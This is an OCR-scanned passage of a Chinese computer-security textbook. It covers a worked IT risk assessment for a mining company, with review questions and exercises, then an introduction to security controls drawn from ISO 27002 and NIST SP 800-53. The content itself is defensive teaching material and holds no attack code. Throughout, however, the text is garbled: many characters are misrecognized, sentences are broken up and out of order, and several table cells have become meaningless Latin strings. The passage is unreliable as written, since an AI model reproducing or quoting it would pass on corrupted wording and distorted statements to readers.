继续 运营 的 能 力 。 然 而 ， 它 对 高 效 的 运营 产生 的 影响 将 是 决定 性 的 。 后 果 等 级 分 别 选 为 “中 
等 ”和 “轻微 "， 最 终 风 险 等 级 分 别 为 “高 ”和 “中 。 

最 后 一 个 资产 是 邮件 服务 的 可 用 性 、 完 整 性 和 保密 性 。 没 有 有 效 的 电子 邮件 系统 ， 公 司 
的 运营 将 缺乏 效率 。 由 于 近年 来 邮件 蠕虫 沁 滥 ， 许 多 组 织 出 现 过 邮件 系统 故障 。 通过 电子 邮件 


传播 的 新 型 漏洞 利用 程序 已 被 多 次 报告 。 针 对 常见 程序 的 源 洞 利用 更 引起 了 关注 。 公 司 对 邮件 
系统 的 大 量 使 用 ， 包 括 员工 经 常 性 地 交换 和 打开 邮件 附件 ， 都 意味 着 受到 攻击 特别 是 针对 常 
见 文件 类 型 的 0-day 攻击 的 可 能 性 是 非常 高 的 。 尽 管 公司 确实 在 它 的 因特网 网 关 过 滤 邮 件 ， 但 
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O-day 攻击 未 被 捕获 的 可 能 性 也 是 很 高 的 。 针 对 邮件 网 关 的 拒绝 服务 攻击 是 非常 难以 防范 的 。 


因此 ， 在 识别 出 各 种 可 能 攻击 的 范围 很 广 以 及 攻击 很 快 就 发 生 的 概率 非常 高 的 情况 下 ， 选 择 可 
与 管理 层 的 讨论 表明 ， 尽 管 存在 其 他 可 能 的 通信 方式 ,但 这 些 方式 
不 能 传输 电子 文件 。 通 过 采购 系统 下 订单 ， 必 须 具 有 获取 电子 报价 的 能 力 。 报 告 和 其 他 交流 通 
过 电子 邮件 定期 传送 ,任何 报 告 不 能 发 送 或 不 能 接收 的 情况 都 可 能 影响 公司 的 名 誉 。 在 严重 的 
攻击 发 生 后 ， 重 建 电 子 邮 件 系统 需要 成 本 和 时 间 。 因 为 攻击 将 不 会 有 大 的 影响 ， 后 有 果 等 级 选 为 


能 性 等 级 为 “几乎 必然 ”。 


“轻微 。 最 终 风 险 等 级 为 “高 ”。 


以 上 信息 被 总 结 后 呈送 给 管理 层 。 所 有 最 终 风 险 等 级 都 在 管理 层 指定 的 可 接受 的 最 小 等 
级 之 上 。 因 此 需要 进行 处 置 。 尽 管 上 面 列 出 的 第 二 个 资产 具有 最 高 的 风险 级 别 ， 但 管理 层 认 
为 SCADA 网 络 的 风险 是 不 可 接受 的 ， 因 为 它 存在 人 员 和 死亡 的 可 能 性 ， 不 管 可 能 性 有 多 小 。 而 
且 ， 管 理 层 认为 政府 监管 者 也 不 会 看 好 一 家 对 致命 威胁 不 予以 高 度 重 视 的 公司 。 因 此 ， 管 理 层 
决定 指定 SCADA 的 风险 为 最 高 级 别 。 存 储 信息 完整 性 的 风险 放 在 第 二 位 。 管 理 层 还 决定 把 电 
子 邮 件 系统 的 风险 放 在 最 后 一 位 ， 排 在 维护 /生产 系统 的 较 低 风 险 之 后 ， 这 样 做 的 部 分 原因 是 


因为 电子 邮件 系统 受 损 将 不 会 影响 采矿 和 处 理 单 元 的 产 出 ， 另 外 对 其 处 置 所 涉及 的 公司 邮件 网 
关 是 在 管理 层 控制 之 外 的 。 


这 次 风险 评估 过 程 的 最 终结 果 是 总 体 风险 注册 表 ， 在 表 14-6 中 列 出 。 该 表 显 示 了 已 识 
别 资产 、 资 产 面临 的 威胁 以 及 赋予 的 等 级 和 优先 级 。 这 些 信息 继而 影响 对 适当 处 置 的 选择 。 管 
理 层 决定 对 前 5 个 风险 实施 适当 的 控制 措施 ， 以 减少 风险 发 生 的 可 能 性 和 造成 的 影响 。 下 一 章 
讨论 这 个 过 程 。 这 些 风 险 没 有 一 个 是 可 以 接受 或 规避 的 。 邮 件 系统 发 生 风 险 的 责任 主要 与 其 母 


公司 所 属 的 IT 集团 有 关 ， 该 集团 管理 外 部 邮件 网 关 。 因 此 应 当 与 IT 集团 共同 分 担 该 风险 。 


146 关键 术语 、 复 习题 和 习题 


关键 术语 

asset (资产 ) risk (风险 ) 

consequence (后 果 ) risk appetite( 风险 偏好 ) 
control (控制 措施 ) risk assessment (风险 评估 ) 
IT security management (IT 安全 管理 ) risk register (风险 注册 表 ) 
level of risk (风险 等 级 ) threat (威胁 ) 

likelihood (可 能 性 ) threat source (威胁 源 ) 
organizational security policy (组 织 安 全 方针 ) vulnerability (脆弱 性 ) 
复习 题 

14.1 给 出 IT 安全 管理 的 定义 。 

14.2 列 出 IT 安全 管理 试图 解决 的 三 个 基本 问题 。 

14.3 列 出 用 来 解决 三 个 基本 问题 的 过 程 的 步 又。 

14.4 列 出 一 些 用 于 为 IT 安全 管理 和 风险 评估 提供 指导 的 重要 的 国际 和 国家 标准 。 
14.5 列 出 并 简要 定义 循环 进行 的 安全 管理 过 程 中 的 4 个 步骤 。 

14.6 组 织 的 安全 目标 决定 了 需要 什么 样 的 IT 安全 结果 ， 其 中 部 分 基于 信息 系统 在 组 织 


性 。 列 出 一 些 问 题 来 帮助 前 明 以 上 观点 。 


中 的 角色 和 重要 


485 
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14.7 

14.8 

14.9 

14.10 
14.11 
14.12 
14.13 
14.14 
14.15 
14.16 


习题 


14.1 


14.2 


14.3 


14.6 


14.7 


14.8 


列 出 并 简要 定义 识别 并 降低 IT 风险 的 4 种 方法 。 

在 识别 并 降低 IT 风险 的 4 种 方法 中 ，ISO 13335 认为 哪 一 种 对 大 多 数组 织 来 说 成 本 效益 最 高 。 
列 出 详细 的 安全 风险 分 析 过 程 的 步骤 。 

给 出 资产 控制 措施 、 威 胁 、 风 险 和 脆弱 性 的 定义 。 

: 指出 在 确定 每 一 个 关键 资产 、 被 损害 的 可 能 性 、 损 害 造成 的 后 果 时 ， 谁 提供 了 关键 信息 ? 
说 明 帮 助 识别 资产 面临 的 威胁 与 风险 的 两 个 关键 问题 。 简 要 说 明 如 何 回答 这 两 个 问题 。 

给 出 后 果 和 可 能 性 的 定义 。 

确定 风险 的 简单 公式 是 什么 ”为 什么 在 实践 中 通常 不 使 用 这 个 等 式 ? 

在 风险 注册 表 中 ， 对 于 已 识别 的 每 个 资产 / 威胁 需要 具体 说 明 那 些 项 ? 

列 出 并 简要 说 明 用 来 处 置 已 识别 风险 的 $ 种 可 选 方案 。 


研究 你 所 在 的 大 学 或 者 其 他 与 你 有 关系 的 组 织 所 使 用 的 IT 安全 方针 。 确 认 一 下 这 个 安全 策略 是 针 
对 14.2 节 中 所 列 出 的 哪 一 个 主题 的 。 如 果 可 能 ， 识 别 应 用 于 该 组 织 的 法 律 或 规章 要 求 。 你 认为 该 
方针 能 恰当 地 处 理 所 有 相关 的 问题 吗 ?” 有 没有 一 些 问题 ， 策 略 应 当 处 理 但 没有 处 理 ? 

在 一 个 只 有 有 限 IT 支持 的 小 型 会 计 事务 所 里 ， 作 为 对 桌面 系统 的 形式 化 风险 评估 的 一 部 分 ， 你 已 
经 识别 了 “桌面 系统 上 的 客户 和 财务 数据 文件 的 完整 性 ”资产 和 相应 的 威胁 “蠕虫 /病毒 侵 人 这 些 
系统 导致 这 些 文件 损坏 ”。 对 于 这 里 提 到 的 资产 和 威胁 ， 对 风险 注册 表 中 的 各 项 给 出 合理 的 值 ， 并 
说 明 你 的 选择 理由 。 

在 一 个 小 型 的 律师 事务 所 ， 作 为 对 主 文件 服务 器 的 形式 化 风险 评估 的 一 部 分 ， 你 已 经 识别 了 “ 服 
务 器 上 的 会 计 记 录 的 完整 性 ”资产 和 相应 的 威胁 “职员 通过 改变 会 计 记 录 来 隐瞒 财务 欺骗 的 行为 ”。 
对 于 这 里 提 到 的 资产 和 威胁 ， 对 风险 注册 表 中 的 各 项 给 出 合理 的 值 ， 并 说 明 你 的 选择 理由 。 

在 一 个 小 型 网 页 设计 公司 ， 作 为 对 外 部 服务 器 的 形式 化 风险 评估 的 一 部 分 ， 你 已 经 识别 了 “组 织 
Web 服务 器 的 完整 性 ”资产 和 相应 的 威胁 “对 Web 服务 器 的 攻击 和 算 改 ”。 对 于 这 里 提 到 的 资产 
和 威胁 ， 对 风险 注册 表 中 的 各 项 给 出 合理 的 值 ， 并 说 明 你 的 选择 理由 。 

在 一 个 IT 安全 顾问 公司 ， 作 为 对 主 文件 服务 顺 的 形式 化 风险 评估 的 一 部 分 ， 你 已 经 识别 了 “指导 
对 客户 的 渗透 测试 时 所 使 用 技术 的 保密 性 ， 储 存在 服务 器 上 的 测试 结果 的 保密 性 ”资产 和 相应 的 
威胁 “机 密 的 和 敏感 的 信息 被 外 部 或 内 部 人 员 究 取 / 泄露" 。 对 于 这 里 提 到 的 资产 和 威胁 ， 对 风险 
注册 表 中 的 各 项 给 出 合理 的 值 ， 并 说 明 你 的 选择 理由 。 

在 一 个 大 型 政府 部 门 ， 作 为 对 职员 使 用 手提 式 电脑 情况 的 形式 化 风险 评估 的 一 部 分 ， 你 已 经 识别 
了 “储存 在 手提 式 电 脑 上 未 加 密 的 数据 库 副本 中 的 人 事 信 息 的 保密 性 ”资产 和 相应 的 威胁 “通过 
盗 穷 手提 式 电 脑 而 窃取 人 员 信 息 并 进而 盗用 身份 信息 ”。 对 于 这 里 提 到 的 资产 和 威胁 ， 对 风险 登记 
册 中 的 各 项 给 出 合理 的 值 ， 并 说 明 你 的 选择 理由 。 

在 一 个 小 型 公共 服务 机 构 ， 作 为 形式 化 风险 评估 过 程 的 一 部 分 ， 给 出 组 织 所 面临 的 一 些 威胁 。 使 
用 本 章 所 引用 的 各 种 风险 评估 标准 中 所 提供 的 核查 表 作为 辅助 。 

NIST SP 800-30 的 2002 年 最 初版 本 的 副本 可 以 从 box.com/CompSec4e 获得 。 比 较 该 文件 中 说 明 可 
能 性 、 后 果 和 风险 等 级 的 表 3-4 ER 3-7 与 本 章 相 对 应 的 表 14-2 ER 14-4。 它 们 有 什么 主要 的 不 
同 ? 使 用 这 些 不 同 的 表 ， 对 风险 评估 的 细节 水 平 有 什么 影响 ? 你 认为 NIST 表格 在 最 新 版 本 中 有 显 
著 变 化 吗 ? 
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学 习 目 标 
学 习 完 本 章 之 后 ， 你 应 该 能 够 : 
列 出 各 种 不 同 种 类 和 类 型 的 有 效 的 控制 措施 ; 


概述 选择 恰当 的 控制 措施 来 处 置 风 险 的 过 程 ; 
概述 针对 已 识别 风险 的 实施 方案 ; 
理解 实施 持续 的 后 续 安 全 保障 工作 的 必要 性 。 





在 第 14 章 中 ， 我 们 引入 了 IT 安全 管理 作为 一 个 形式 化 的 过 程 ， 以 此 确保 以 比较 经 济 的 方 
式 对 关键 资产 进行 充分 的 保护 ; 随后 讨论 了 关键 的 风险 评估 过 程 。 本 章 将 继续 讨论 IT 安全 管 
理 。 我 们 将 研究 一 系列 能 够 用 于 改进 IT 系统 和 过 程 安全 的 管理 、 运 行 和 技术 方面 的 控制 措施 
或 保障 措施 。 接 下 来 探讨 安全 计划 的 内 容 ， 其 中 详细 前 明了 安全 计划 实现 的 过 程 。 然 后 实施 这 
些 计 划 ， 同 时 通过 培训 确保 所 有 人 员 能 够 清楚 各 自 的 职责 ， 并 通过 监视 确保 安全 符合 性 。 最 
后 ， 为 了 确保 能 够 达到 合适 的 安全 级 别 ， 管 理 层 必须 
进一步 对 安全 控制 的 有 效 性 进行 评价 ， 并 重复 整个 IT 
安全 管理 过 程 。 


15.1 IT 安全 管理 的 实施 

我 们 在 第 14 章 中 介绍 了 IT 安全 管理 的 过 程 ， 如 
图 14-1 所 示 。 第 14 章 主 要 讨论 安全 管理 过 程 的 前 期 
阶段 ， 本 章 则 侧重 于 安全 管理 的 后 期 阶段 ， 包 括 选 择 
安全 控制 措施 、 开 发 实施 计划 以 及 对 计划 实施 的 后 续 
监管 等 。 我 们 基本 上 遵循 了 文献 NIST SP 800-39 ( 
理 信息 安全 风险 : 组 织 、 任 务 和 信息 系统 视角 ，2011 
年 3 月 ) 所 提供 的 指南 ， 该 指南 是 由 NIST 于 2011 年 
依据 FISMA 开发 的 ， 它 对 信息 安全 风险 管理 提供 了 
一 个 集成 的 、 组 织 机 构 范 围 的 实施 程序 ， 是 一 份 旗舰 
式 的 文件 。 图 15-1 对 这 些 安全 管理 的 实施 步骤 进行 
了 概要 性 的 总 结 。 下 面 我 们 将 依次 讨论 这 些 内 容 。 
15.2 ”安全 控制 或 保障 措施 图 15-1 IT 安全 管理 控制 措施 与 实施 过 程 

对 一 个 组 织 的 信息 系统 进行 风险 评估 首先 应 该 识别 出 需要 处 置 的 领域 。 下 一 个 步骤 就 是 选 
择 合适 的 风险 分 析 方 法 ， 也 就 是 选择 用 于 风险 处 置 的 合适 的 安全 控制 措施 ， 如 图 14-1 tas. IT 


安全 控制 措施 (control)、 保 障 措施 (safeguard) 或 对 策 (countermeasure) (这 些 术语 可 以 互 换 
使 用 ) 可 以 用 于 降低 风险 。 我 们 采用 以 下 定义 : 














第 1 步 : 确定 风险 优先 级 
管理 评审 风险 注册 表 


第 2 步 : 响应 风险 






确定 风险 响应 方式 
( 接受 、 规 避 、 降 低 、 分 担 ) 


评价 推荐 的 可 选 控制 措施 
选择 控制 措施 


开发 实施 计划 


实施 已 选 控制 措施 


控制 措施 : 通过 一 些 方 法 减少 风险 的 措施 、 设 备 、 规 程 或 其 他 举措 ， 这 些 方法 包括 : 消除 或 


预防 安全 违规 现象 ;将 安全 违规 造成 的 损害 减 到 最 小 ; 或 者 发 现 并 报告 安全 违规 现象 进而 局 
动 纠 正 措施 。 
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一 些 安全 控制 措施 能 够 同时 处 理 多 个 风险 ， 选 择 这 样 的 控制 措施 是 非常 合算 的 。 控 制 措施 


可 以 分 为 以 下 几 类 (尽管 有 些 控 制 措施 同时 包含 了 其 中 几 类 的 特征 ): 


e 管理 控制 措施 (management control): 主要 是 安全 策略 、 计 划 、 指 南 和 标准 ， 这 些 都 会 对 
选择 降低 风险 损失 、 保 护 组 织 任务 的 操作 和 技术 控制 产生 影响 。 这 些 安全 控制 措施 指出 了 

” 管理 层 需要 解决 的 一 些 问 题 。 我 们 在 第 14 章 和 第 15 章 中 讨论 了 大 量 这 方面 的 控制 手段 。 

e 运行 控制 措施 (operational control): 主要 是 解决 安全 策略 和 标准 的 正确 实施 和 使 用 问 
题 ， 确 保安 全 操作 的 一 致 性 并 纠正 已 识别 的 运行 缺陷 。 这 些 控制 措施 涉及 主要 由 人 而 
不 是 由 系统 实施 的 机 制 和 规程 ， 它 们 是 用 来 改善 一 个 或 一 组 系统 的 安全 状况 的 。 我 们 
将 在 第 16 章 和 第 17 章 讨 论 部 分 这 方面 的 控制 方法 。 

© 技术 控制 措施 〈technical control): 涉及 对 系统 硬件 和 软件 安全 能 力 的 正确 使 用 。 这 些 
从 人 简单 到 复 洒 的 措施 协同 工作 ， 可 确保 关键 和 敏感 的 数据 、 信 息 和 IT 系统 功能 的 安 
全 。 图 15-2 列举 了 一 些 典 型 的 技术 控制 措施 。 本 书 的 第 一 部 分 和 第 二 部 分 也 讨论 了 这 
方面 的 控制 措施 。 

以 上 每 一 类 控制 措施 都 可 以 依次 包含 如 下 不 同类 型 的 措施 : 

e 支持 性 控制 措施 (supportive control): 是 指 与 其 他 探 制 措施 相关 联 的 或 者 被 其 他 控制 措 

施 采 用 的 普 适 的 、 通 用 的 、 基 础 性 的 技术 方面 的 全 安全 能 力 。 

预防 性 控制 措施 (preventative control): 主要 通过 阻止 企图 违反 安全 策略 或 利用 脆弱 性 

的 行为 来 预防 安全 违规 事件 的 发 生 。 

检测 和 恢复 控制 措施 (detection and recovery control): 主要 通过 以 下 方式 对 安全 违规 做 

出 啊 应 : 对 违反 或 试图 违反 安全 策略 或 者 已 识别 的 脆弱 性 利用 的 行为 进行 警告 ;提供 

恰当 的 恢复 因 上 述 行为 而 损失 的 计算 资源 的 方法 。 

在 图 15-2 中 列 出 的 技术 控制 措施 包括 了 上 述 每 一 种 类 型 控制 措施 的 实例 。 

Ta 





k 访问 控制 实施 


-一 一 一 ~ 






受 保护 的 通信 
( 通过 阻止 泄露 、 蔡 代 、 修 改 和 重 放 攻击 来 达到 的 安全 ) | 
识别 


密 钥 管 理 


安全 管理 


系统 保护 
(最 小 特权 、 客 体重 用 、 进 程 隔离 等 ) 


图 15-2 技术 安全 控制 
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很 多 国家 标准 和 国际 标准 都 提供 了 安全 控制 列表 ， 这 些 标准 包括 ISO 27002 (信息 安全 管 
理 实施 细则 ，2013 年 )、ISO 13335 (信息 与 通信 技术 安全 管理 ，2004 年 )、FIPS 200 (联邦 信 
息 和 信息 系统 最 低 安 全 要 求 ，2006 年 3 月 ) 和 NIST SP 800-53 (联邦 信息 系统 推荐 安全 控制 ， 
2015 年 1 月 )。 这 些 标准 中 的 应 该 采用 的 控制 类 型 和 典型 控制 的 详细 清单 等 方面 大 致 相同 。 事 
上 ， 这 些 标准 之 间 的 交叉 引用 就 表明 它们 在 形成 这 些 列 表 的 过 程 中 所 遵循 的 原则 是 一 致 的 。 
ISO 27002 通常 被 认为 是 控制 措施 的 总 清单 ， 因 而 它 被 其 他 标准 引用 得 也 是 最 多 的 。 表 15-1 
(改编 自 NIST SP 800-53 的 表 1 ) 列 出 了 每 一 类 控制 措施 中 的 典型 控制 族 。 将 其 与 表 15-2 详细 
描述 的 ISO 27002 中 的 控制 类 型 以 及 表 1-4 列 出 的 FIPS 200 中 的 控制 类 型 相 比 较 ， 就 会 发 现 
它们 之 间 有 着 高 度 的 重 码 。 这 些 控 制 类 中 的 每 一 类 都 有 一 份 很 长 的 具体 的 控制 列表 可 供 选 
择 。 表 15-3 (改编 自 NIST SP 800-53 附录 D 和 G 中 的 表 ) 列 出 了 这 个 标准 中 的 所 有 安全 控制 
措施 。 
为 了 达到 可 接受 的 安全 级 别 ， 应 选择 这 些 控制 措施 的 某 些 组 合 。 如 果 正 在 使 用 基线 方 
法 ， 那 么 我 们 也 应 当 在 政府 或 者 相关 行业 的 标准 中 规定 一 组 合适 的 控制 措施 的 基线 。 例 如 ， 
NIST SP 800-53 的 附录 D 中 分 别 列 出 了 在 低 、 中 、 高 影响 的 信息 系统 中 可 用 的 基线 控制 措施 
的 选择 项 。 控 制 措施 的 选择 应 当 考 虑 到 公司 的 总 体 风 险 状 况 以 及 资源 和 能 力 。 这 些 控制 措施 应 
当 在 组 织 的 所 有 信息 系统 中 实施 ， 并 且 根 据 具体 系统 的 不 同 要 求 ， 可 在 一 定 范围 内 加 以 调整 。 


表 15-1 NIST SP 800-53 安全 控制 措施 


管理 运行 系统 和 信息 完整 性 


表 15-2 ISO/IEC 27002 的 安全 控制 


控 制 类 H $ 

安全 方针 依据 业务 要 求 和 相关 法 律 法 规 提供 管理 指导 并 支持 信息 安全 

信息 安全 组 织 ”建立 管理 框架 ， 以 启动 和 控制 组 织 范围 内 的 信息 安全 实施 和 运行 ; 确保 远程 办 公 和 移 
动 设备 使 用 的 安全 ‘ 

人 力 资 源 安全 i eh gayi MA hei 
员 意 识 到 并 完成 他 们 的 信息 安全 责任 ; 作为 变更 或 终止 任用 过 程 的 一 部 分 ,保护 组 织 利益 

资产 管理 识别 组 织 次 7 并 确定 适当 的 保护 责任 ; 确保 信息 按照 其 对 组 织 的 重要 性 受到 恰当 等 级 
的 保护 ;防止 存储 在 介质 中 的 信息 遭受 未 授权 泄露 、 人 和 修改、 清除 或 销毁 

访问 控制 _ 限 制 对 信息 导 信 息 处 理 设施 的 访问 ; 确保 授权 用 户 访问 系统 和 服务 并 防止 未 授权 的 访 
问 ; 让 用 户 负 责 保护 他 们 自己 的 授权 信息 ; 防止 对 系统 和 应 用 的 未 授权 访问 

密码 技术 确保 正确 和 有 效 地 使 用 密码 技术 ， 保 护 信息 的 机 密 性 、 真 实 性 和 完整 性 

物理 与 环境 安全 防止 对 组 织 信息 和 信息 处 理 设施 未 授权 的 物理 访问 、 损 坏 和 干扰 ; 防止 资产 的 丢失 、 


损坏 、 失 窃 或 危及 资产 安全 并 中 断 组 织 的 运行 
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( 续 ) 
控 $ 类 AHE tk 
确保 正确 安全 地 操作 信息 处 理 设施 ;确保 信息 与 信息 处 理 设 施 免 受 恶 意 软 件 的 破坏 ， 防 
操作 安全 范 恶 意 软件 ; 防止 数据 损失 ; 记录 事件 并 产生 证 据 ; 确保 运行 系统 的 完整 性 ; 防止 利用 技 
术 脆 弱 性 ; 尽量 减少 审计 活动 对 操作 系统 的 影响 
Sy 确保 网 络 中 信息 及 其 支持 性 信息 处 理 设施 受 保护 ; 确保 组 织 内 部 和 所 有 外 部 实体 信息 转 
通信 安全 移 的 安全 


确保 信息 安全 是 贯穿 信息 系统 生命 周期 的 有 机 组 成 部 分 ， 这 还 包括 通过 公 网 提供 服务 
系统 获取 、 开 发 和 维护 | 的 信息 系统 的 安全 要 求 ; 确保 信息 安全 被 设计 和 应 用 在 信息 系统 整个 生命 周期 中 ; 确保 测 


试用 数据 的 保护 

确保 保护 供应 商 可 以 访问 的 组 织 资产 ; 根据 供应 商 协 议 维持 商定 的 信息 安全 和 服务 交付 
供应 商 关 系 水 平 
信息 安全 事件 管理 确保 一 个 一 致 和 有 效 的 方法 管理 信息 安全 事件 ， 其 中 包括 安全 事态 和 弱点 的 沟通 
信息 安全 连续 性 将 IT 连续 性 散人 组 织 的 业务 连续 性 管理 系统 中 ; 确保 信息 处 理 设施 的 可 用 性 
符合 性 避免 违反 与 信息 安全 和 任何 安全 要 求 相关 的 法 律 、 法 令 、 法 规 或 合同 义务 ; 确保 信息 安 

全 的 实施 和 操作 符合 组 织 的 策略 和 规程 
表 15-3 NIST SP 800-53 的 详细 安全 控制 

访问 控制 


访问 控制 策略 与 规程 ， 账 户 管理 ,访问 强制 ， 信 息 流 强制 ， 职 责 分 离 ， 最 小 特权 ,失败 登录 次 数 ， 系 统 使 用 通知 ， 上 
次 登录 (访问 ) A, HARA, SMB, 会话 终止 ， 无 标识 或 鉴别 的 许可 动作 ， 安 全 属性 ， 远 程 访问 ,无 线 访 
问 ， 移 动 设备 访问 控制 ， 外 部 信息 系统 使 用 ， 信 息 共享 ， 可 公开 访问 的 内 容 ， 数 据 挖 据 保护， 访问 控制 决策 ， 引 用 监视 


意识 与 培训 
安全 意识 与 培训 的 策略 与 规程 ， 安 全 意识 培训， 基于 角色 的 安全 培训 ,安全 培训 记录 
审计 与 可 核查 性 


审计 与 可 核查 性 的 策略 与 规程 ， 可 审计 事件 ， 审 计 记 录 的 内 容 ， 审 计 存 储 能 力 ， 审 计 处 理 失效 啊 应 ， 审 计 复查 、 
分 析 与 报告 ， 审 计 归 约 与 报告 生成 ， 时 间 戳 ， 审 计 信息 保护 ， 抗 抵赖 ， 审 计 记录 保持 ， 审 计生 成 ,信息 泄露 监视 ， 
会 话 审计 ， 蔡 代 审 计 能 力 ， 路 组 织 审计 


安全 评估 与 授权 


安全 评估 与 授权 的 策略 与 规程 ， 安 全 评估 ， 信 息 系 统 连 接 ， 行 动 计划 和 里 程 碑 ， 安 全 认可 ， 持 续 监 视 ， 渗 透 测 
试 ， 内 部 系统 连接 


配置 管理 


配置 管理 策略 与 规程 ， 基 线 配 置 ， 配 置 变更 控制 ， 安 全 影响 分 析 ， 对 于 变更 的 访问 限制 ， 配 置 设置 ， 最 小 功能 
性 ， 信 息 系统 组 件 清单 ， 配 置 管理 计划 ， 软 件 使 用 限制 ， 用 户 安 装 的 软件 


应 急 规划 


应 急 规划 策略 和 规程 ， 应 急 计划 ， 应 急 培 训 ， 应 急 计划 测试 ， 备 用 存储 场所 ， 备 用 处 理 场所 ， 电 信服 务 ， 信 息 系 
统 备份 ， 信 息 系统 恢复 与 重建 ， 备 用 通信 协议 ， 安 全 模式 ， 蔡 代 安 全 机 制 


标识 与 鉴别 

标识 与 鉴别 的 策略 与 规程 ， 标 识 与 鉴别 (组 织 用 户 )， 设 备 标识 与 鉴别 ， 识 别 符 管理 ， 鉴 别 器 管理 ， 鉴 别 器 反馈 ， 
密码 模块 鉴别 ， 标 识 与 鉴别 ( 非 组 织 用 户 )， 服 务 识别 和 鉴别 ， 自 适应 识别 和 鉴别 ， 重 新 鉴别 
事件 响应 


事件 响应 策略 与 规程 ， 事件 响 应 培训 ， 事 件 响应 测试 ， 事 件 处 理 ， 事 件 监视 ， 事件 报告 ,事件 响应 援助 ， 事 件 响 
应 计划 ,信息 溢出 响应 ,综合 信息 安全 分 析 团 队 


维护 
系统 维护 策略 与 规程 ， 可 控 维 护 ， 维 护 工具 ， 非 本 地 维护 ， 维 护 人 员 ， 定 期 维护 
介质 保护 
介质 保护 策略 与 规程 ， 介 质 访 问 ， 介 质 标记 ， 介 质 存储 ， 介 质 运输 ， 介 质 净化 ， 介 质 使 用 ， 介 质 降级 
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( 续 ) 
物理 与 环境 保护 
物理 与 环境 保护 的 策略 与 规程 ， 物 理 访问 授权 ,物理 访 问 控制 ， 传 输 介质 访问 控制 ， 输 出 设备 访问 控制 ， 监 视 物 


理 访 问 ， 来 访 者 控制 ， 访 问 记 录 ， 电 力 设备 与 电力 线 缆 ， 应 急 关 闭 ， 应 急电 源 ， 应 急 照明 ， 火 灾 保 护 ， 温 度 与 湿度 
控制 ， 水 损害 保护 ， 交 付 与 移 除 ， 备 用 工作 场所 ， 信 息 系统 组 件 位 置 ， 信 息 泄 露 ， 资 产 监控 与 跟踪 


规划 

安全 规划 策略 与 规程 ， 系 统 安 全 计划 ， 行 为 规则 ,运营 安全 概念 ， 信 息 安 全 架构 ， 中 央 管 理 

人 员 安 全 

人 员 安 全 策略 与 规程 ， 职 位 风险 指定 ， 人 员 审 查 ， 人 员 终 止 ， 人 员 调 动 ， 访 问 协议 ， 第 三 方 人 员 安 全 ， 人 员 处 罚 
风险 评估 

风险 评 佑 策略 与 规程 ， 安 全 分 类 ， 风 险 评估 ， 脆 弱 性 扫描 ， 技 术 监督 对 策 调 查 

系统 与 服务 获取 

系统 和 服务 获取 的 策略 与 规程 ， 资 源 分 配 ， 系 统 开发 生命 周期 ， 获 取 过 程 ， 信 息 系 统 文档 ， 安 全 工程 原则 ， 外 部 
信息 系统 服务 ， 开 发 者 配置 管理 ， 开 发 人 员 安 全 测试 和 评估 ， 供 应 链 保护 ， 可 信 性 ， 关 键 性 分 析 ， 开 发 过 程 、 标 准 


和 工具 ,开发 人 员 提 供 的 培训 ， 开 发 人 员 安 全 架构 和 设计 ， 防 自 改 和 检测 ， 组 件 真实 性 ， 关 键 组 件 的 定制 开发 ， 开 
发 人 员 筛 选 ， 不 支持 的 系统 组 件 
系统 与 通信 保护 

系统 与 通信 保护 的 策略 与 规程 ， 应 用 程序 分 割 ， 安 全 功能 隔离 ， 共 享 资源 信息 ， 拒 绝 服务 保护 ， 资 源 可 
用 性 , 边界 保护 ， 传 输 保 密 性 和 完整 性 ， 网 络 断 开 ， 可 信 路 径 ， 密 钥 建 立 与 管理 ， 密 码 保 护 ， 协 作 计 算 设 
备 ， 安 全 属性 的 传输 ， 公 钥 基 础 设施 证 书 ， 移 动 代码 ，Internet 协议 语音 ， 安 全 名 /地 址 解析 服务 (权威 来 
源 ， 递 归 或 缓存 解析 器 ， 架 构 和 供应 )， 会 话 真实 性 ， 已 知 状态 失败 ， 瘦 结 点 ， 蜜 链 ， 平 台 无 关 ， 剩 余 信 息 保 
护 ， 异 构 ， 隐 瞒 和 误导 ， 隐 项 通道 分 析 ， 信 息 系 统 分 割 ， 传 输 准 备 完整 性 ， 不 可 修改 的 可 执行 程序 ， 蜜 客户 端 
(Honeyclient)， 分 布 式 处 理 和 存储 ， 带 外 通道 ， 操 作 安全 性 ,过 程 隔 离 ， 无 线 链 路 保护 ， 端 口 和 LO 设备 访问 ， 
传 感 需 功 能 和 数据 ， 使 用 限制 ， 引 爆 室 (Detonation Chamber) 


系统 与 信息 完整 性 
系统 与 信息 完整 性 的 策略 与 规程 ， 缺 陷 修复 ， 恶 意 代 码 保护 ， 信 息 系统 监视 ， 安 全 警报 咨询 和 指令 ， 安 全 功能 验 


证 ， 软 件 固 件 与 信息 完整 性 ， 垃 圾 邮件 保护 ， 信 息 输 入 限制 ， 信 息 输入 验证 ， 差 错 处 理 ， 信 息 处 理 和 保留 ， 可 预测 
失效 防护 ， 非 持久 性 ， 信 息 输 出 过 滤 ， 内 存 保 护 ， 故 障 安全 程序 


项 目 管理 
信息 安全 项 目 计划 ， 高 级 信息 安全 官 ， 信 息 安全 资源 ， 行 动 计划 与 里 程 碑 过 程 ， 信 息 系统 资产 清单 ， 信 息 安全 绩 


效 措施 ， 企 业 架 构 ， 关 键 基 础 设施 计划 ， 风 险 管理 战略 ， 安 全 授权 过 程 ， 使 命 /业务 过 程 定义 ， 内 部 威胁 计划 ， 信 
Bee AR, 测试 培训 和 监控 ， 与 安全 组 和 协会 的 联系 ， 威 胁 意识 计划 


NIST SP 800-18( 联 邦 信息 系统 安全 计划 开发 指南 ，2006 年 2 月 ) 建议 ， 当 考虑 如 下 内 容 

时 ， 有 必要 进行 适当 的 调整 ; 

e 技术 (technology): 某 些 控制 措施 仅仅 适用 于 特定 的 技术 ， 因 此 只 有 在 系统 中 包含 了 
这 些 技术 的 时 候 ， 才 需要 用 到 这 些 控制 措施 。 这 方面 的 例子 包括 无 线 网 络 和 密码 技术 。 
某 些 控制 措施 只 有 在 系统 需要 并 且 支 持 这 些 技术 的 时 候 才 适用 ,例如 作为 访问 权 标 
(access token) 的 读 卡 器 。 如 果 一 个 系统 中 不 文 持 这 些 技术 ， 那 么 可 以 采用 其 他 手段 ， 
包括 用 管理 规程 或 者 物理 访问 控制 措施 来 代替 。 


e 公共 控制 措施 (common control): 整个 公司 可 能 是 集中 管理 ， 因 此 安全 问题 并 不 是 茶 
个 特定 系统 的 管理 者 的 责任 。 控 制 措施 的 变更 需要 共同 协商 和 集中 管理 。 

e 公开 访问 系统 (public access system): 一 些 系统 ， 如 组 织 的 公共 Web 服务 器 ， 是 可 以 被 
